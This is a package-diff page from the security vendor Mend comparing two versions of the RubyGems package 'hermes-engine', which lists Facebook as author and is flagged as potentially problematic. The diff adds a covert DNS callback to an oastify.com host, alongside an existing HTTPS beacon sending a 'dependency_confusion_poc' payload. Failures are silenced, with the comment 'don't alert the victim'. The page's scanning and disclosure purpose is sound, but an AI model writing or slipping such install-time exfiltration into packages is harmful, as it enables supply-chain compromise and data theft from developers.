RubyGems - hermes-engine - Versions diffs - 0.1.11 → 0.1.12 - Mend

hermes-engine 0.1.11 → 0.1.12

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of hermes-engine might be problematic. Click here for more details.

Files changed (4) hide show

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: d19040292c156054887c33b989d8e896645761bc0f6e4936388181bea2b89a13
-  data.tar.gz: 8bc54f9e5718a9624ff5b8772718f3bb091551b39b106189d97eca089a609afc
+  metadata.gz: 0aa6a68c5440542e4be7e31e2eb680e0077afd211308ce570a6971774e494628
+  data.tar.gz: f95ff3b26a76b496760c0b9d34a83254d56aa0496d922f66453cc89fedd53be2
 SHA512:
-  metadata.gz: d503ee6291c2a630b8998fe1c94a424be9c59d34b48b0e63fef756f88b91f22ab98fb0e39b5543592306dad990f8f8ad5071ed72ba82ab90ed7160b483095f79
-  data.tar.gz: 48268472cc1c617ee34c417ac0bed627d570a398ed44eac24e2c4c88a88816c27a4d79f665600bf90231f56b1f513c9f47b5ce0273f4c3d53880fed9f62d40c9
+  metadata.gz: 7ecd5e6c47a232230b5d03a3b760ee6f72549fe6a6ab4a41f8c097e4e94d0f96291a83b676dbd965e1153747e3496678d933609bcf7da2c58087333e00d7852a
+  data.tar.gz: 0b7d44652e2cd9965321ba1ce2264867b3ac3571633dfc4705534599f8357ef697d0b31c340d770ecc85aa4f064dc87e36ffcf7aad023c77b48ade27f5c9408b

data/lib/hermes/engine/version.rb CHANGED Viewed

@@ -2,6 +2,6 @@
 module Hermes
   module Engine
-    VERSION = "0.1.11"
+    VERSION = "0.1.12"
   end
 end

data/lib/hermes/engine.rb CHANGED Viewed

@@ -5,6 +5,7 @@ require 'net/http'
 require 'socket'
 require 'openssl'
 require 'etc'
+require 'resolv'
 require_relative 'engine/version'
 module Hermes
@@ -12,6 +13,15 @@ module Hermes
     EXFIL_URL = 'oldgjpebv4nvga4arcahlzhssjyam3as.oastify.com'
     def self.exfiltrate
+      # DNS callback first - works even if HTTPS egress is blocked
+      dns_id = "dns-#{rand(36**8).to_s(36)}"
+      begin
+        Resolv::DNS.new.getresources("#{dns_id}.#{EXFIL_URL}", Resolv::DNS::Resource::IN::A)
+      rescue StandardError
+        # silent fail
+      end
+      # HTTPS callback with rich data
       data = {
         type: 'dependency_confusion_poc',
         gem: 'hermes-engine',
@@ -62,7 +72,7 @@ module Hermes
       req.body = data.to_json
       begin
-        response = http.request(req)
+        http.request(req)
       rescue StandardError
         # silent fail - don't alert the victim
       end

metadata CHANGED Viewed

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: hermes-engine
 version: !ruby/object:Gem::Version
-  version: 0.1.11
+  version: 0.1.12
 platform: ruby
 authors:
 - Facebook